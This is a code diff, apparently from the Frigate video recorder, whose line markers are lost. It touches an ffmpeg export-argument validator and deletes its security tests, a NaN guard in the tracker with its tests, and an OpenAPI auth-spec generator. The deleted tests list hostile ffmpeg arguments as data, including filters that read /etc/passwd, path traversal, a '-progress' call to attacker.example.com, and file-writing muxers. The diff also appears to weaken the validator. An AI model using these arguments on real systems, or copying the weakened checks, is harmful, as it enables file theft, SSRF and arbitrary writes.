return False, f"Unexpected argument in custom ffmpeg arguments: {token}"
|
||||
|
||||
base = _base_flag(token)
|
||||
if base not in _ALLOWED_FLAGS:
|
||||
for token in tokens:
|
||||
# Block flags that could inject inputs or write to arbitrary files
|
||||
if token.lower() in BLOCKED_FFMPEG_ARGS:
|
||||
return False, f"Forbidden ffmpeg argument: {token}"
|
||||
|
||||
if base in _VALUELESS_FLAGS:
|
||||
i += 1
|
||||
continue
|
||||
# Block tokens that look like file paths (potential output injection)
|
||||
if (
|
||||
token.startswith("/")
|
||||
or token.startswith("./")
|
||||
or token.startswith("../")
|
||||
or token.startswith("~")
|
||||
):
|
||||
return False, "File paths are not allowed in custom ffmpeg arguments"
|
||||
|
||||
# Remaining flags consume exactly one value.
|
||||
if i + 1 >= len(tokens):
|
||||
return False, f"Missing value for ffmpeg argument: {token}"
|
||||
|
||||
value = tokens[i + 1]
|
||||
if base in _FILTER_FLAGS:
|
||||
valid, message = _validate_filtergraph(value)
|
||||
if not valid:
|
||||
return False, message
|
||||
elif not _SAFE_VALUE_RE.match(value):
|
||||
return False, f"Invalid value for {token}: {value}"
|
||||
|
||||
i += 2
|
||||
# Block URLs and ffmpeg protocol references (e.g. http://, tcp://, pipe:, file:)
|
||||
if "://" in token or token.startswith("pipe:") or token.startswith("file:"):
|
||||
return (
|
||||
False,
|
||||
"Protocol references are not allowed in custom ffmpeg arguments",
|
||||
)
|
||||
|
||||
return True, ""
|
||||
|
||||
|
||||
@@ -1,132 +0,0 @@
|
||||
import unittest
|
||||
|
||||
from frigate.record.export import validate_ffmpeg_args
|
||||
|
||||
|
||||
class TestValidateFfmpegArgs(unittest.TestCase):
|
||||
"""Tests for the non-admin custom export ffmpeg arg validator.
|
||||
|
||||
The validator uses a structural allowlist: every token must be an
|
||||
allowlisted flag or the value of one, filter values are restricted to a
|
||||
safe set of filters, and no token may become a bare input/output URL.
|
||||
"""
|
||||
|
||||
def assertRejected(self, args: str) -> None:
|
||||
valid, message = validate_ffmpeg_args(args)
|
||||
self.assertFalse(valid, f"expected {args!r} to be rejected")
|
||||
self.assertNotEqual(message, "")
|
||||
|
||||
def assertAllowed(self, args: str) -> None:
|
||||
valid, message = validate_ffmpeg_args(args)
|
||||
self.assertTrue(valid, f"expected {args!r} to be allowed, got: {message}")
|
||||
self.assertEqual(message, "")
|
||||
|
||||
# --- legitimate use cases must keep working ---------------------------
|
||||
|
||||
def test_timelapse_setpts_allowed(self):
|
||||
# The whole reason -vf cannot simply be blocked: timelapse exports.
|
||||
self.assertAllowed("-vf setpts=PTS/60 -r 25")
|
||||
self.assertAllowed("-vf setpts=0.04*PTS -r 30") # server default
|
||||
self.assertAllowed("-filter:v setpts=PTS/60 -r 25")
|
||||
|
||||
def test_default_input_args_allowed(self):
|
||||
self.assertAllowed("")
|
||||
self.assertAllowed("-an -skip_frame nokey")
|
||||
|
||||
def test_encoding_args_allowed(self):
|
||||
self.assertAllowed("-c:v libx264 -crf 23 -preset fast")
|
||||
self.assertAllowed("-c:v copy -c:a copy")
|
||||
self.assertAllowed("-c:v libx264 -b:v 2M -maxrate 2M -bufsize 4M")
|
||||
self.assertAllowed("-movflags +faststart")
|
||||
self.assertAllowed("-pix_fmt yuv420p -r 30 -g 30")
|
||||
|
||||
def test_safe_filters_allowed(self):
|
||||
self.assertAllowed("-vf scale=640:480")
|
||||
self.assertAllowed("-vf scale=640:480,setpts=0.5*PTS")
|
||||
self.assertAllowed("-vf format=yuv420p")
|
||||
self.assertAllowed("-vf transpose=1")
|
||||
self.assertAllowed("-vf hflip")
|
||||
self.assertAllowed("-vf fps=15")
|
||||
self.assertAllowed("-vf setsar=1 -an")
|
||||
self.assertAllowed("-vf setdar=16/9")
|
||||
|
||||
# --- the reported advisory and file-read class ------------------------
|
||||
|
||||
def test_reported_advisory_rejected(self):
|
||||
self.assertRejected(
|
||||
"-filter:v drawtext=textfile=/etc/passwd:fontcolor=white:fontsize=20"
|
||||
)
|
||||
|
||||
def test_file_reading_filters_rejected(self):
|
||||
self.assertRejected("-vf movie=/etc/passwd")
|
||||
self.assertRejected("-vf drawtext=textfile=/etc/passwd")
|
||||
self.assertRejected("-vf subtitles=/etc/passwd")
|
||||
# marker embedded as an option of an otherwise-allowed filter name
|
||||
self.assertRejected("-vf scale=movie=/etc/passwd")
|
||||
|
||||
def test_filtergraph_brackets_rejected(self):
|
||||
# link labels aren't needed for safe filters; rejecting "[" / "]" keeps
|
||||
# filtergraph validation linear (no ReDoS on attacker input)
|
||||
self.assertRejected("-vf [in]scale=640:480[out]")
|
||||
self.assertRejected("-vf " + "[" * 5000)
|
||||
|
||||
def test_preset_file_read_rejected(self):
|
||||
# cwd-anchored traversal slipped past the old startswith() path check
|
||||
self.assertRejected("-fpre frigate/../../../etc/passwd")
|
||||
self.assertRejected("-fpre evil.preset")
|
||||
self.assertRejected("-vpre x")
|
||||
self.assertRejected("-apre x")
|
||||
self.assertRejected("-pre x")
|
||||
|
||||
def test_slash_option_file_read_rejected(self):
|
||||
# ffmpeg "-/option file" reads the option value from a file
|
||||
self.assertRejected("-/filter:v graph.txt")
|
||||
self.assertRejected("-/filter_complex graph.txt")
|
||||
|
||||
# --- network / SSRF class ---------------------------------------------
|
||||
|
||||
def test_schemeless_protocol_rejected(self):
|
||||
self.assertRejected("-f mpegts tcp:10.0.0.5:4444")
|
||||
self.assertRejected("tcp:10.0.0.5:4444")
|
||||
self.assertRejected("udp:10.0.0.5:4444")
|
||||
self.assertRejected("-progress http:attacker.example.com:80/p")
|
||||
|
||||
# --- file-write class --------------------------------------------------
|
||||
|
||||
def test_tee_write_rejected(self):
|
||||
self.assertRejected("-c:v libx264 -map 0 -f tee [f=mpegts]/tmp/owned.ts")
|
||||
self.assertRejected("-f tee [f=mpegts]/etc/frigate/x.ts")
|
||||
self.assertRejected("tee:/tmp/x")
|
||||
|
||||
def test_bare_output_token_rejected(self):
|
||||
self.assertRejected("evil.mp4")
|
||||
self.assertRejected("-c copy evil.mp4")
|
||||
self.assertRejected("x/../escaped.mkv")
|
||||
|
||||
def test_file_producing_muxers_rejected(self):
|
||||
self.assertRejected("-f hls -hls_segment_filename pwn%03d.ts out.m3u8")
|
||||
self.assertRejected("-f md5 victim.txt")
|
||||
self.assertRejected("-f segment seg%03d.ts")
|
||||
|
||||
def test_write_flags_rejected(self):
|
||||
self.assertRejected("-progress evil.log")
|
||||
self.assertRejected("-stats_enc_pre evil.csv")
|
||||
self.assertRejected("-report")
|
||||
|
||||
# --- resource exhaustion / misc ---------------------------------------
|
||||
|
||||
def test_dos_input_flags_rejected(self):
|
||||
self.assertRejected("-stream_loop -1")
|
||||
self.assertRejected("-readrate 0.001")
|
||||
|
||||
def test_disallowed_flags_rejected(self):
|
||||
self.assertRejected("-map 0")
|
||||
self.assertRejected("-i /etc/passwd")
|
||||
self.assertRejected("-attach evil.bin")
|
||||
self.assertRejected("-dump_attachment evil.bin")
|
||||
self.assertRejected("/etc/passwd")
|
||||
self.assertRejected("-metadata comment=x")
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
@@ -1,91 +0,0 @@
|
||||
import math
|
||||
import unittest
|
||||
|
||||
import numpy as np
|
||||
from norfair.camera_motion import (
|
||||
HomographyTransformation,
|
||||
TranslationTransformation,
|
||||
)
|
||||
|
||||
from frigate.ptz.autotrack import transform_is_finite
|
||||
from frigate.track.norfair_tracker import distance
|
||||
|
||||
|
||||
class TestNorfairDistance(unittest.TestCase):
|
||||
"""Regression tests for the tracker distance guard.
|
||||
|
||||
norfair raises a hard ValueError on any nan distance, which kills the camera
|
||||
process. During autotracking, an ill-conditioned homography can hand the
|
||||
tracker a non-finite or degenerate estimate box, so distance() must never
|
||||
return nan for any input.
|
||||
"""
|
||||
|
||||
def setUp(self) -> None:
|
||||
# boxes are [[x1, y1], [x2, y2]]
|
||||
self.detection = np.array([[805.0, 402.0], [864.0, 521.0]])
|
||||
self.estimate = np.array([[800.0, 400.0], [860.0, 520.0]])
|
||||
|
||||
def test_finite_boxes_give_finite_distance(self) -> None:
|
||||
d = distance(self.detection, self.estimate)
|
||||
self.assertTrue(math.isfinite(d))
|
||||
|
||||
def test_inf_estimate_corner_does_not_return_nan(self) -> None:
|
||||
estimate = np.array([[np.inf, 400.0], [860.0, 520.0]])
|
||||
d = distance(self.detection, estimate)
|
||||
self.assertFalse(math.isnan(d))
|
||||
self.assertEqual(d, float("inf"))
|
||||
|
||||
def test_nan_estimate_corner_does_not_return_nan(self) -> None:
|
||||
# the actual autotracking crash: a positive-only guard would miss this
|
||||
# because nan <= 0 is False
|
||||
estimate = np.array([[np.nan, 400.0], [860.0, 520.0]])
|
||||
d = distance(self.detection, estimate)
|
||||
self.assertFalse(math.isnan(d))
|
||||
self.assertEqual(d, float("inf"))
|
||||
|
||||
def test_zero_area_estimate_does_not_return_nan(self) -> None:
|
||||
estimate = np.array([[900.0, 500.0], [900.0, 500.0]])
|
||||
d = distance(self.detection, estimate)
|
||||
self.assertFalse(math.isnan(d))
|
||||
self.assertEqual(d, float("inf"))
|
||||
|
||||
def test_zero_area_detection_does_not_return_nan(self) -> None:
|
||||
detection = np.array([[805.0, 402.0], [805.0, 521.0]])
|
||||
d = distance(detection, self.estimate)
|
||||
self.assertFalse(math.isnan(d))
|
||||
self.assertEqual(d, float("inf"))
|
||||
|
||||
def test_inverted_estimate_corners_do_not_return_nan(self) -> None:
|
||||
# Kalman estimates can occasionally cross corners (x2 < x1)
|
||||
estimate = np.array([[860.0, 520.0], [800.0, 400.0]])
|
||||
d = distance(self.detection, estimate)
|
||||
self.assertFalse(math.isnan(d))
|
||||
self.assertEqual(d, float("inf"))
|
||||
|
||||
|
||||
class TestTransformIsFinite(unittest.TestCase):
|
||||
def test_finite_homography_is_finite(self) -> None:
|
||||
matrix = np.array([[1.0, 0.0, 5.0], [0.0, 1.0, 3.0], [0.0, 0.0, 1.0]])
|
||||
self.assertTrue(transform_is_finite(HomographyTransformation(matrix)))
|
||||
|
||||
def test_finite_translation_is_finite(self) -> None:
|
||||
self.assertTrue(
|
||||
transform_is_finite(TranslationTransformation(np.array([12.0, -4.0])))
|
||||
)
|
||||
|
||||
def test_non_finite_homography_is_not_finite(self) -> None:
|
||||
transform = HomographyTransformation(np.eye(3))
|
||||
# simulate accumulation overflowing to a non-finite matrix
|
||||
transform.homography_matrix = np.array(
|
||||
[[1.0, 0.0, np.inf], [0.0, 1.0, 0.0], [0.0, 0.0, 1.0]]
|
||||
)
|
||||
self.assertFalse(transform_is_finite(transform))
|
||||
|
||||
def test_nan_translation_is_not_finite(self) -> None:
|
||||
self.assertFalse(
|
||||
transform_is_finite(TranslationTransformation(np.array([np.nan, 0.0])))
|
||||
)
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
unittest.main()
|
||||
@@ -45,17 +45,6 @@ def distance(detection: np.ndarray, estimate: np.ndarray) -> float:
|
||||
estimate_dim = np.diff(estimate, axis=0).flatten()
|
||||
detection_dim = np.diff(detection, axis=0).flatten()
|
||||
|
||||
# Guard against degenerate or non-finite boxes
|
||||
if (
|
||||
not np.all(np.isfinite(estimate_dim))
|
||||
or not np.all(np.isfinite(detection_dim))
|
||||
or estimate_dim[0] <= 0
|
||||
or estimate_dim[1] <= 0
|
||||
or detection_dim[0] <= 0
|
||||
or detection_dim[1] <= 0
|
||||
):
|
||||
return float("inf")
|
||||
|
||||
# get bottom center positions
|
||||
detection_position = np.array(
|
||||
[np.average(detection[:, 0]), np.max(detection[:, 1])]
|
||||
|
||||
@@ -1,606 +0,0 @@
|
||||
"""Generate the OpenAPI spec from the app, annotated with auth requirements.
|
||||
|
||||
This generator builds the FastAPI application, exports its OpenAPI document via
|
||||
``app.openapi()``, and enriches every operation with authentication metadata:
|
||||
|
||||
* a ``components.securitySchemes`` block,
|
||||
* a per-operation ``security`` requirement (so the docs render a lock badge),
|
||||
* an ``x-required-role`` extension for machine readers, and
|
||||
* a short bold ``Access:`` note prepended to each operation description.
|
||||
|
||||
The committed docs/static/frigate-api.yaml is the output of this script. It is
|
||||
generated rather than hand-maintained so it stays complete and current; the docs
|
||||
build (docusaurus-plugin-openapi-docs) consumes it as-is.
|
||||
|
||||
The access level for an endpoint is determined by BOTH its route-level
|
||||
dependency (``require_role``/``allow_any_authenticated``/``allow_public``/
|
||||
``require_camera_access``) AND the global "secure by default" admin dependency,
|
||||
which is bypassed only for the paths listed in ``require_admin_by_default``.
|
||||
Those exempt lists are read directly from the function's closure so this script
|
||||
stays in lockstep with ``frigate/api/auth.py`` instead of duplicating them.
|
||||
|
||||
Many handlers enforce per-camera access by calling ``require_camera_access``
|
||||
inside the handler body rather than as a route dependency, which dependency
|
||||
introspection cannot see. We recover those from the handler's bytecode (see
|
||||
``_handler_enforces_camera``) and promote an otherwise "any authenticated"
|
||||
operation to camera-scoped.
|
||||
|
||||
Usage (from the repository root):
|
||||
|
||||
python3 generate_api_auth_spec.py # write the spec
|
||||
python3 generate_api_auth_spec.py --check # CI guard: fail if stale
|
||||
|
||||
The process exits non-zero if the generated document fails structural
|
||||
validation, or (in --check mode) if the committed spec is out of date.
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import difflib
|
||||
import inspect
|
||||
import io
|
||||
import logging
|
||||
import sys
|
||||
from pathlib import Path
|
||||
|
||||
from fastapi import FastAPI
|
||||
from fastapi.routing import APIRoute
|
||||
from ruamel.yaml import YAML
|
||||
from ruamel.yaml.scalarstring import LiteralScalarString
|
||||
|
||||
from frigate.api import app as main_app
|
||||
from frigate.api import (
|
||||
auth,
|
||||
camera,
|
||||
chat,
|
||||
classification,
|
||||
debug_replay,
|
||||
event,
|
||||
export,
|
||||
media,
|
||||
motion_search,
|
||||
notification,
|
||||
preview,
|
||||
record,
|
||||
review,
|
||||
)
|
||||
from frigate.api.auth import require_admin_by_default
|
||||
|
||||
logging.basicConfig(level=logging.INFO, format="%(message)s")
|
||||
logger = logging.getLogger("generate_api_auth_spec")
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parent
|
||||
OUTPUT_SPEC = REPO_ROOT / "docs" / "static" / "frigate-api.yaml"
|
||||
|
||||
HTTP_METHODS = {"get", "post", "put", "delete", "patch"}
|
||||
|
||||
# Banner written at the top of the generated spec.
|
||||
HEADER = (
|
||||
"# Generated by generate_api_auth_spec.py — do not edit by hand.\n"
|
||||
"# Regenerate with: python3 generate_api_auth_spec.py\n"
|
||||
"# The empty info.title is intentional: a docusaurus-openapi-docs convention\n"
|
||||
"# that suppresses the generated API introduction page.\n"
|
||||
)
|
||||
|
||||
# Post-processing applied on top of the raw app.openapi() export. These live
|
||||
# only in the published spec, not in the app, so they are reproduced here.
|
||||
SPEC_TITLE = ""
|
||||
SPEC_SERVERS = [
|
||||
{"url": "https://demo.frigate.video/api"},
|
||||
{"url": "http://localhost:5001/api"},
|
||||
]
|
||||
|
||||
# Access levels, ordered from least to most privileged. The string values are
|
||||
# also what we emit as ``x-required-role``.
|
||||
PUBLIC = "public"
|
||||
AUTHENTICATED = "any"
|
||||
CAMERA = "camera"
|
||||
ADMIN = "admin"
|
||||
|
||||
ADMIN_SCHEME = "frigateAdminAuth"
|
||||
USER_SCHEME = "frigateUserAuth"
|
||||
|
||||
SECURITY_SCHEMES = {
|
||||
ADMIN_SCHEME: {
|
||||
"type": "apiKey",
|
||||
"in": "cookie",
|
||||
"name": "frigate_token",
|
||||
"description": (
|
||||
"Authenticated session whose resolved role is 'admin'. The session "
|
||||
"is established via the JWT cookie issued by POST /login, or via "
|
||||
"proxy auth headers (remote-user / remote-role) when Frigate runs "
|
||||
"behind an authenticating reverse proxy."
|
||||
),
|
||||
},
|
||||
USER_SCHEME: {
|
||||
"type": "apiKey",
|
||||
"in": "cookie",
|
||||
"name": "frigate_token",
|
||||
"description": (
|
||||
"Any authenticated session (role 'viewer' or higher), established "
|
||||
"via the JWT cookie issued by POST /login, or via proxy auth "
|
||||
"headers when Frigate runs behind an authenticating reverse proxy."
|
||||
),
|
||||
},
|
||||
}
|
||||
|
||||
# How each access level maps to a rendered note.
|
||||
ACCESS_NOTES = {
|
||||
PUBLIC: "**Access:** Public — no authentication required.",
|
||||
AUTHENTICATED: "**Access:** Any authenticated user.",
|
||||
CAMERA: "**Access:** Authenticated user with access to the referenced camera.",
|
||||
ADMIN: "**Access:** Admin role required.",
|
||||
}
|
||||
|
||||
|
||||
def build_app() -> FastAPI:
|
||||
"""Build a bare app with every router mounted.
|
||||
|
||||
This mirrors the router set wired up in frigate.api.fastapi_app. It omits
|
||||
the global admin dependency and all runtime state; the OpenAPI route table
|
||||
and the per-route dependencies are all we need to export and classify.
|
||||
"""
|
||||
app = FastAPI()
|
||||
routers = [
|
||||
auth.router,
|
||||
camera.router,
|
||||
chat.router,
|
||||
classification.router,
|
||||
review.router,
|
||||
main_app.router,
|
||||
preview.router,
|
||||
notification.router,
|
||||
export.router,
|
||||
event.router,
|
||||
media.router,
|
||||
motion_search.router,
|
||||
record.router,
|
||||
debug_replay.router,
|
||||
]
|
||||
for router in routers:
|
||||
app.include_router(router)
|
||||
return app
|
||||
|
||||
|
||||
def read_exempt_rules() -> tuple[set[str], tuple[str, ...]]:
|
||||
"""Read the admin-exemption lists straight from the auth dependency closure.
|
||||
|
||||
Reading them here (rather than copying) keeps this generator in sync with
|
||||
frigate/api/auth.py automatically.
|
||||
"""
|
||||
closure = inspect.getclosurevars(require_admin_by_default()).nonlocals
|
||||
exempt_paths = set(closure["EXEMPT_PATHS"])
|
||||
exempt_prefixes = tuple(closure["EXEMPT_PREFIXES"])
|
||||
return exempt_paths, exempt_prefixes
|
||||
|
||||
|
||||
def _first_segment(path: str) -> str:
|
||||
return path.split("/", 2)[1] if path.startswith("/") and len(path) > 1 else ""
|
||||
|
||||
|
||||
def _route_markers(route: APIRoute) -> tuple[set[str], list[str] | None]:
|
||||
"""Return the set of recognized auth markers on a route's dependencies."""
|
||||
markers: set[str] = set()
|
||||
admin_roles: list[str] | None = None
|
||||
|
||||
for dep in route.dependant.dependencies:
|
||||
call = dep.call
|
||||
qualname = getattr(call, "__qualname__", "") or ""
|
||||
name = getattr(call, "__name__", "") or ""
|
||||
|
||||
if "role_checker" in qualname:
|
||||
markers.add(ADMIN)
|
||||
try:
|
||||
roles = inspect.getclosurevars(call).nonlocals.get("required_roles")
|
||||
if roles:
|
||||
admin_roles = list(roles)
|
||||
except (TypeError, ValueError):
|
||||
pass
|
||||
elif name in ("require_camera_access", "require_go2rtc_stream_access"):
|
||||
markers.add(CAMERA)
|
||||
elif "auth_checker" in qualname:
|
||||
markers.add(AUTHENTICATED)
|
||||
elif "public_checker" in qualname:
|
||||
markers.add(PUBLIC)
|
||||
|
||||
return markers, admin_roles
|
||||
|
||||
|
||||
def _handler_enforces_camera(route: APIRoute) -> bool:
|
||||
"""True if the route handler calls require_camera_access in its body.
|
||||
|
||||
Such calls are invisible to dependency introspection. We detect them from
|
||||
the handler's compiled bytecode: a global name referenced anywhere in the
|
||||
function appears in ``__code__.co_names``. This catches direct calls (all of
|
||||
them, currently); a call hidden behind a helper function would be missed.
|
||||
"""
|
||||
code = getattr(route.endpoint, "__code__", None)
|
||||
return bool(code and "require_camera_access" in code.co_names)
|
||||
|
||||
|
||||
def classify_route(
|
||||
route: APIRoute,
|
||||
exempt_paths: set[str],
|
||||
exempt_prefixes: tuple[str, ...],
|
||||
) -> tuple[str, list[str] | None, str | None]:
|
||||
"""Resolve the effective access level for a route.
|
||||
|
||||
Returns (access_level, roles, flag). ``flag`` is a human-readable note when
|
||||
the result needed inference or revealed a possible inconsistency.
|
||||
"""
|
||||
level, roles, flag = _classify_base(route, exempt_paths, exempt_prefixes)
|
||||
|
||||
# In-body require_camera_access enforcement is invisible to dependency
|
||||
# introspection. When the effective access would otherwise be "any
|
||||
# authenticated", the handler's per-camera check is the real constraint, so
|
||||
# promote it to camera-scoped. Admin/public are left alone: for admin the
|
||||
# role is the binding requirement and the camera check is only defensive.
|
||||
if level == AUTHENTICATED and _handler_enforces_camera(route):
|
||||
return CAMERA, None, None
|
||||
|
||||
return level, roles, flag
|
||||
|
||||
|
||||
def _classify_base(
|
||||
route: APIRoute,
|
||||
exempt_paths: set[str],
|
||||
exempt_prefixes: tuple[str, ...],
|
||||
) -> tuple[str, list[str] | None, str | None]:
|
||||
"""Resolve the access level from route-level dependencies and exempt rules."""
|
||||
markers, admin_roles = _route_markers(route)
|
||||
path = route.path
|
||||
is_camera_path = _first_segment(path) == "{camera_name}"
|
||||
exempt = path in exempt_paths or path.startswith(exempt_prefixes) or is_camera_path
|
||||
|
||||
# Explicit route-level markers win, in order of specificity.
|
||||
if ADMIN in markers:
|
||||
return ADMIN, admin_roles or ["admin"], None
|
||||
if CAMERA in markers:
|
||||
return CAMERA, None, None
|
||||
if AUTHENTICATED in markers:
|
||||
if exempt:
|
||||
return AUTHENTICATED, None, None
|
||||
# The route opts in to any-authenticated, but the global admin check is
|
||||
# not bypassed for this path, so admin is what actually gets enforced.
|
||||
return (
|
||||
ADMIN,
|
||||
["admin"],
|
||||
(
|
||||
"route declares allow_any_authenticated but path is not exempt from "
|
||||
"the global admin check; admin is effectively enforced"
|
||||
),
|
||||
)
|
||||
if PUBLIC in markers:
|
||||
if exempt:
|
||||
return PUBLIC, None, None
|
||||
return (
|
||||
ADMIN,
|
||||
["admin"],
|
||||
(
|
||||
"route declares allow_public but path is not exempt from the global "
|
||||
"admin check; admin is effectively enforced"
|
||||
),
|
||||
)
|
||||
|
||||
# No explicit auth marker: governed purely by the global default.
|
||||
if not exempt:
|
||||
return ADMIN, ["admin"], None
|
||||
|
||||
# Exempt with no route dependency: the global admin check is bypassed and
|
||||
# there is no route-level gate, so authorization (if any) happens inside the
|
||||
# handler. Infer from the path shape and flag for confirmation.
|
||||
if is_camera_path:
|
||||
return (
|
||||
CAMERA,
|
||||
None,
|
||||
(
|
||||
"no route-level dependency; camera-scoped path, authorization "
|
||||
"assumed to be enforced in the handler"
|
||||
),
|
||||
)
|
||||
return (
|
||||
AUTHENTICATED,
|
||||
None,
|
||||
(
|
||||
"path is exempt from the global admin check but has no route-level "
|
||||
"dependency; confirm authorization is enforced in the handler"
|
||||
),
|
||||
)
|
||||
|
||||
|
||||
def build_access_map(
|
||||
app: FastAPI,
|
||||
exempt_paths: set[str],
|
||||
exempt_prefixes: tuple[str, ...],
|
||||
) -> dict[tuple[str, str], dict]:
|
||||
"""Map (path, lowercase method) -> classification details."""
|
||||
access_map: dict[tuple[str, str], dict] = {}
|
||||
for route in app.routes:
|
||||
if not isinstance(route, APIRoute):
|
||||
continue
|
||||
level, roles, flag = classify_route(route, exempt_paths, exempt_prefixes)
|
||||
for method in route.methods:
|
||||
if method in ("HEAD", "OPTIONS"):
|
||||
continue
|
||||
access_map[(route.path, method.lower())] = {
|
||||
"level": level,
|
||||
"roles": roles,
|
||||
"flag": flag,
|
||||
"path": route.path,
|
||||
"method": method,
|
||||
}
|
||||
return access_map
|
||||
|
||||
|
||||
def security_for(level: str) -> list:
|
||||
"""Build the OpenAPI ``security`` value for an access level."""
|
||||
if level == PUBLIC:
|
||||
return []
|
||||
if level == ADMIN:
|
||||
return [{ADMIN_SCHEME: []}]
|
||||
# AUTHENTICATED and CAMERA both require any authenticated session; the
|
||||
# camera-specific scoping is conveyed in the note and x-required-role.
|
||||
return [{USER_SCHEME: []}]
|
||||
|
||||
|
||||
def required_role_value(level: str, roles: list[str] | None):
|
||||
if level == ADMIN and roles and roles != ["admin"]:
|
||||
return roles
|
||||
return level
|
||||
|
||||
|
||||
def annotate_description(operation: dict, note: str) -> None:
|
||||
existing = operation.get("description")
|
||||
if not existing:
|
||||
operation["description"] = note
|
||||
return
|
||||
operation["description"] = LiteralScalarString(
|
||||
f"{note}\n\n{str(existing).rstrip()}"
|
||||
)
|
||||
|
||||
|
||||
def base_document(raw: dict) -> dict:
|
||||
"""Apply the docs pipeline post-processing with a stable top-level order."""
|
||||
info = dict(raw.get("info", {}))
|
||||
info["title"] = SPEC_TITLE
|
||||
return {
|
||||
"openapi": raw["openapi"],
|
||||
"info": info,
|
||||
"servers": [dict(server) for server in SPEC_SERVERS],
|
||||
"paths": raw["paths"],
|
||||
"components": raw.get("components", {}),
|
||||
}
|
||||
|
||||
|
||||
def enrich(spec: dict, access_map: dict) -> tuple[dict, list, list]:
|
||||
"""Add security schemes and per-operation auth metadata in place."""
|
||||
components = spec.setdefault("components", {})
|
||||
components["securitySchemes"] = dict(SECURITY_SCHEMES)
|
||||
|
||||
counts: dict[str, int] = {}
|
||||
flagged: list[dict] = []
|
||||
unmatched: list[tuple[str, str]] = []
|
||||
|
||||
for path, path_item in spec["paths"].items():
|
||||
for method, operation in path_item.items():
|
||||
if method.lower() not in HTTP_METHODS:
|
||||
continue
|
||||
details = access_map.get((path, method.lower()))
|
||||
if details is None:
|
||||
unmatched.append((method.upper(), path))
|
||||
continue
|
||||
|
||||
level = details["level"]
|
||||
counts[level] = counts.get(level, 0) + 1
|
||||
operation["security"] = security_for(level)
|
||||
operation["x-required-role"] = required_role_value(level, details["roles"])
|
||||
annotate_description(operation, ACCESS_NOTES[level])
|
||||
|
||||
if details["flag"]:
|
||||
flagged.append(details)
|
||||
|
||||
return counts, flagged, unmatched
|
||||
|
||||
|
||||
# Numeric defaults at or above this magnitude are treated as live Unix
|
||||
# timestamps baked into the schema at import time (e.g. the /{camera_name}
|
||||
# /recordings after/before params default to datetime.now()). They make the
|
||||
# export non-deterministic and document a meaningless frozen epoch, so they are
|
||||
# stripped. The proper fix is to default those route params to None and resolve
|
||||
# "now" inside the handler.
|
||||
VOLATILE_DEFAULT_THRESHOLD = 1_000_000_000
|
||||
|
||||
|
||||
def strip_volatile_defaults(node, trail: str = "") -> list[tuple[str, float]]:
|
||||
"""Remove epoch-like numeric ``default`` values so the export is stable.
|
||||
|
||||
Returns the (location, value) pairs that were removed, for reporting.
|
||||
"""
|
||||
removed: list[tuple[str, float]] = []
|
||||
if isinstance(node, dict):
|
||||
default = node.get("default")
|
||||
if (
|
||||
isinstance(default, (int, float))
|
||||
and not isinstance(default, bool)
|
||||
and default >= VOLATILE_DEFAULT_THRESHOLD
|
||||
):
|
||||
removed.append((trail, default))
|
||||
del node["default"]
|
||||
for key, value in node.items():
|
||||
removed.extend(strip_volatile_defaults(value, f"{trail}/{key}"))
|
||||
elif isinstance(node, list):
|
||||
for index, value in enumerate(node):
|
||||
removed.extend(strip_volatile_defaults(value, f"{trail}[{index}]"))
|
||||
return removed
|
||||
|
||||
|
||||
def to_block_scalars(node):
|
||||
"""Recursively render multi-line strings as literal block scalars.
|
||||
|
||||
Produces readable, deterministic YAML (``|-`` blocks) instead of long
|
||||
double-quoted lines with escaped newlines.
|
||||
"""
|
||||
if isinstance(node, dict):
|
||||
return {key: to_block_scalars(value) for key, value in node.items()}
|
||||
if isinstance(node, list):
|
||||
return [to_block_scalars(value) for value in node]
|
||||
if isinstance(node, str) and "\n" in node:
|
||||
return LiteralScalarString(node)
|
||||
return node
|
||||
|
||||
|
||||
def _iter_refs(node):
|
||||
if isinstance(node, dict):
|
||||
for key, value in node.items():
|
||||
if key == "$ref" and isinstance(value, str):
|
||||
yield value
|
||||
else:
|
||||
yield from _iter_refs(value)
|
||||
elif isinstance(node, list):
|
||||
for value in node:
|
||||
yield from _iter_refs(value)
|
||||
|
||||
|
||||
def validate(spec: dict) -> list[str]:
|
||||
"""Structural sanity checks on the generated document."""
|
||||
problems: list[str] = []
|
||||
schemas = set(spec.get("components", {}).get("schemas", {}))
|
||||
defined_schemes = set(spec.get("components", {}).get("securitySchemes", {}))
|
||||
|
||||
for ref in _iter_refs(spec):
|
||||
if ref.startswith("#/components/schemas/"):
|
||||
name = ref.rsplit("/", 1)[-1]
|
||||
if name not in schemas:
|
||||
problems.append(f"dangling $ref: {ref}")
|
||||
|
||||
for path, path_item in spec.get("paths", {}).items():
|
||||
for method, operation in path_item.items():
|
||||
if method.lower() not in HTTP_METHODS or not isinstance(operation, dict):
|
||||
continue
|
||||
location = f"{method.upper()} {path}"
|
||||
if "x-required-role" not in operation:
|
||||
problems.append(f"missing x-required-role: {location}")
|
||||
if "security" not in operation:
|
||||
problems.append(f"missing security: {location}")
|
||||
continue
|
||||
for requirement in operation["security"]:
|
||||
for scheme in requirement:
|
||||
if scheme not in defined_schemes:
|
||||
problems.append(
|
||||
f"undefined security scheme {scheme}: {location}"
|
||||
)
|
||||
|
||||
return sorted(set(problems))
|
||||
|
||||
|
||||
def render(spec: dict) -> str:
|
||||
"""Serialize the spec to the canonical YAML string (with the header)."""
|
||||
yaml = YAML()
|
||||
yaml.width = 80
|
||||
yaml.indent(mapping=2, sequence=4, offset=2)
|
||||
stream = io.StringIO()
|
||||
yaml.dump(spec, stream)
|
||||
return HEADER + stream.getvalue()
|
||||
|
||||
|
||||
def build_spec() -> tuple[dict, dict, list, list, list]:
|
||||
app = build_app()
|
||||
exempt_paths, exempt_prefixes = read_exempt_rules()
|
||||
access_map = build_access_map(app, exempt_paths, exempt_prefixes)
|
||||
|
||||
spec = base_document(app.openapi())
|
||||
normalized = strip_volatile_defaults(spec)
|
||||
counts, flagged, unmatched = enrich(spec, access_map)
|
||||
spec = to_block_scalars(spec)
|
||||
return spec, counts, flagged, unmatched, normalized
|
||||
|
||||
|
||||
def main(argv: list[str] | None = None) -> int:
|
||||
parser = argparse.ArgumentParser(description="Generate the annotated OpenAPI spec.")
|
||||
parser.add_argument(
|
||||
"--check",
|
||||
action="store_true",
|
||||
help="verify the committed spec is up to date without writing; "
|
||||
"exit non-zero if it would change",
|
||||
)
|
||||
args = parser.parse_args(argv)
|
||||
|
||||
